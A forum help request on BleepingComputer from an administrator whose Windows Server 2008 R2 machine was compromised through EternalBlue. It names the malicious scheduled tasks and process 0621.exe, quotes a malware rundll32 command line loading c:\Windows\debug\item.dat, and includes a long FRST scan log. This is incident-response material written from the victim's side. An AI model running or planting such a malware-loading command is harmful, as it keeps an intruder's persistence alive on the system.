Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

EternalBlue Related Compromise


  • This topic is locked This topic is locked
9 replies to this topic

#1 tonybemidji

tonybemidji

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:10:41 PM

Posted 06 July 2017 - 09:45 AM

Greetings...
 
Had a system that we missed when patching and one brief window of time while installing a new firewall was enough to allow this compromise in to hit a couple of systems.
 
This one in particular is a Server 2008r2 install.   I noticed an odd process running one day (0621.exe) and also noted three new scheduled tasks... Mysa1, Mysa2 and OK.
 
After some digging I'm pretty confident that what we have is pretty accurately described here:
 
https://www.cyphort.com/eternalblue-exploit-actively-used-deliver-remote-access-trojans/
 
I have found and removed the files created and used in the compromise.   I have also since patched the system, disabled SMBv1, run MRT and Malwarebytes.  I have also verified that we are blocking all tcp and udp ports related to these sorts of exploits at the firewall.  
 
My primary concern now is that the three scheduled tasks mentioned above continue to get re-created every few hours.   I'm not quite sure which process is being used to do this and am wondering if anyone here has dealt with this variant and has some insight.
 
I ran FRST and have posted the logs.
 
Thanks.
 
EDIT:  Just noticed another interesting tidbit.   Looking at the Task Manager I found rundll32.exe running with the following command:
 
rundll32.exe c:\Windows\debug\item.dat,ServiceMain aaaa
 
Item.dat was one of the things I have removed in the scouring process.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 05-07-2017
Ran by FCAdmin (administrator) on WIN-BNCF42RPDV3 (06-07-2017 08:32:20)
Running from C:\Users\FCAdmin\Downloads
Loaded Profiles: FCAdmin & Administrator (Available Profiles: FCAdmin & Administrator)
Platform: Windows Server 2008 R2 Standard Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Adaptec Incorporated) C:\Program Files\Adaptec\Adaptec Storage Manager\StorServ.exe
(Unitrends) C:\PCBP\bpnetd.exe
(OpenText Corporation) F:\FCServer\FCS64.exe
(OpenText Corporation) F:\FCServer\fcintsrv64.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Open Text Corporaton) F:\FCServer\FirstClassDS\fcds64.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Windows\System32\Oobe.exe
(Adaptec Inc.) C:\Program Files\Adaptec\Adaptec Storage Manager\archwprv.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM\...\Policies\Explorer: [ShowSuperHidden] 1
HKU\S-1-5-21-3112712058-1343828553-617848957-1000\...\MountPoints2: {07af0a57-d487-11e3-ad38-806e6f6e6963} - D:\LSNavi.exe
HKU\S-1-5-21-3112712058-1343828553-617848957-500\...\MountPoints2: {07af0a57-d487-11e3-ad38-806e6f6e6963} - D:\LSNavi.exe
Lsa: [Notification Packages] scecli rassfm
GroupPolicyScripts: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{8e259d73-19f2-4480-9663-3fb44e272aed} <==== ATTENTION (Restriction - IP)
Tcpip\..\Interfaces\{7C30892D-4FAA-4571-A24C-BCFDD65054B2}: [NameServer] 10.2.0.120,10.1.1.3

Internet Explorer:
==================
HKU\S-1-5-21-3112712058-1343828553-617848957-1000\Software\Microsoft\Internet Explorer\Main,Start Page = res://iesetup.dll/SoftAdmin.htm
HKU\S-1-5-21-3112712058-1343828553-617848957-500\Software\Microsoft\Internet Explorer\Main,Start Page = res://iesetup.dll/SoftAdmin.htm

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdaptecStorageManagerAgent; C:\Program Files\Adaptec\Adaptec Storage Manager\StorServ.exe [119296 2011-11-05] (Adaptec Incorporated) [File not signed]
R3 ArcHwPrv; C:\Program Files\Adaptec\Adaptec Storage Manager\archwprv.exe [332800 2011-11-05] (Adaptec Inc.) [File not signed]
R2 BP_Agent; C:\PCBP\bpnetd.exe [702976 2014-04-15] (Unitrends) [File not signed]
S3 FCRegSvc; C:\Windows\system32\FCRegSvc.dll [25600 2009-07-13] (Microsoft Corporation)
R2 FCS; F:\FCServer\fcs64.exe [6428160 2012-09-12] (OpenText Corporation) [File not signed]
R2 IS; F:\FCServer\FCINTSRV64.EXE [11874304 2015-02-10] (OpenText Corporation) [File not signed]
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S3 RSoPProv; C:\Windows\system32\RSoPProv.exe [91648 2009-07-13] (Microsoft Corporation)
S3 sacsvr; C:\Windows\system32\sacsvr.dll [14848 2009-07-13] (Microsoft Corporation)
S4 winexesvc; C:\Windows\winexesvc.exe [19456 2016-09-30] () [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 e1qexpress; C:\Windows\System32\DRIVERS\e1q60x64.sys [244736 2009-06-10] (Intel Corporation)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77376 2017-05-25] ()
S3 ioatdma; C:\Windows\System32\Drivers\qd260x64.sys [35328 2009-06-10] (Intel Corporation)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [188312 2017-06-29] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [113592 2017-07-05] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [44960 2017-07-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [252832 2017-07-05] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [84256 2017-07-06] (Malwarebytes)
S0 sacdrv; C:\Windows\System32\DRIVERS\sacdrv.sys [96320 2009-07-13] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

NETSVC: sacsvr -> C:\Windows\system32\sacsvr.dll (Microsoft Corporation)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-07-06 08:32 - 2017-07-06 08:32 - 00005863 _____ C:\Users\FCAdmin\Downloads\FRST.txt
2017-07-06 08:32 - 2017-07-06 08:32 - 00000000 ____D C:\FRST
2017-07-06 07:51 - 2017-07-06 07:51 - 02436608 _____ (Farbar) C:\Users\FCAdmin\Downloads\FRST64.exe
2017-07-05 11:20 - 2017-07-05 11:20 - 00315040 _____ C:\Users\FCAdmin\Downloads\ListDlls.zip
2017-07-05 11:20 - 2017-07-05 11:20 - 00000000 ____D C:\Users\FCAdmin\Downloads\ListDlls
2017-07-05 07:11 - 2017-07-05 07:39 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-06-29 11:56 - 2017-06-29 11:56 - 00000000 ____D C:\Users\FCAdmin\AppData\Roaming\Adobe
2017-06-29 11:55 - 2017-06-29 11:55 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Adobe
2017-06-29 11:38 - 2017-06-29 11:47 - 00000075 _____ C:\Windows\system32\p
2017-06-29 10:53 - 2015-07-30 08:13 - 00124624 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2017-06-29 10:53 - 2015-07-30 08:13 - 00103120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-06-29 10:12 - 2017-07-06 05:43 - 00084256 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-06-29 10:12 - 2017-07-05 07:40 - 00252832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-06-29 10:12 - 2017-07-05 07:40 - 00113592 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-06-29 10:12 - 2017-07-05 07:40 - 00044960 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-06-29 10:12 - 2017-06-29 10:12 - 00188312 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-06-29 10:12 - 2017-06-29 10:12 - 00001867 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-06-29 10:12 - 2017-06-29 10:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-06-29 10:12 - 2017-06-29 10:12 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-06-29 10:12 - 2017-06-29 10:12 - 00000000 ____D C:\Program Files\Malwarebytes
2017-06-29 10:12 - 2017-05-25 11:58 - 00077376 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-06-29 10:11 - 2017-06-29 10:11 - 64232976 _____ (Malwarebytes ) C:\Users\FCAdmin\Desktop\mb3-setup-consumer-3.1.2.1733-1.0.141-1.0.2092.exe
2017-06-29 09:49 - 2017-07-05 07:15 - 00000000 ____D C:\Windows\system32\MRT
2017-06-29 09:48 - 2017-06-29 09:48 - 133627792 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-06-29 09:16 - 2013-10-14 18:00 - 00028368 _____ (Microsoft Corporation) C:\Windows\system32\IEUDINIT.EXE
2017-06-29 09:11 - 2017-06-29 09:11 - 24917504 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 19607040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 14404096 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 12829696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 06026240 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 04305920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-06-29 09:11 - 2017-06-29 09:11 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-06-29 09:11 - 2017-06-29 09:11 - 02426880 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 02278912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 02125824 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-06-29 09:11 - 2017-06-29 09:11 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-06-29 09:11 - 2017-06-29 09:11 - 01950720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 01309696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00720384 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00664064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00645120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsIntl.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00616104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dat
2017-06-29 09:11 - 2017-06-29 09:11 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2017-06-29 09:11 - 2017-06-29 09:11 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00503808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-06-29 09:11 - 2017-06-29 09:11 - 00389840 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00342728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-06-29 09:11 - 2017-06-29 09:11 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00247808 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00233472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00208384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00194048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\elshyph.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00182272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msls31.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00167424 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00151552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iexpress.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00139264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00131072 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00127488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IEAdvpack.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00105984 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00101376 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-06-29 09:11 - 2017-06-29 09:11 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00074240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SetIEInstalledDate.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardie.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-06-29 09:11 - 2017-06-29 09:11 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00056832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pngfilt.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmler.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imgutil.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\licmgr10.dll
2017-06-29 09:11 - 2017-06-29 09:11 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00013312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2017-06-29 09:11 - 2017-06-29 09:11 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-06-29 09:09 - 2017-06-29 09:09 - 00859648 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2017-06-29 09:09 - 2017-06-29 09:09 - 00619520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 03928064 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 03419136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 02776576 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 02565120 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 02284544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 01988096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10warp.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 01682432 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 01643520 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 01247744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 01238528 _____ (Microsoft Corporation) C:\Windows\system32\d3d10.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 01175552 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 01158144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsPrint.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 01080832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00648192 _____ (Microsoft Corporation) C:\Windows\system32\d3d10level9.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00604160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10level9.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00522752 _____ (Microsoft Corporation) C:\Windows\system32\XpsGdiConverter.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00465920 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00417792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPhoto.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsGdiConverter.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00363008 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00333312 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1core.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\d3d10core.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00293376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00249856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10_1core.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00245248 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecsExt.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00220160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10core.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00207872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecsExt.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00194560 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAnimation.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00161792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10_1.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00010752 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00010752 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00009728 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
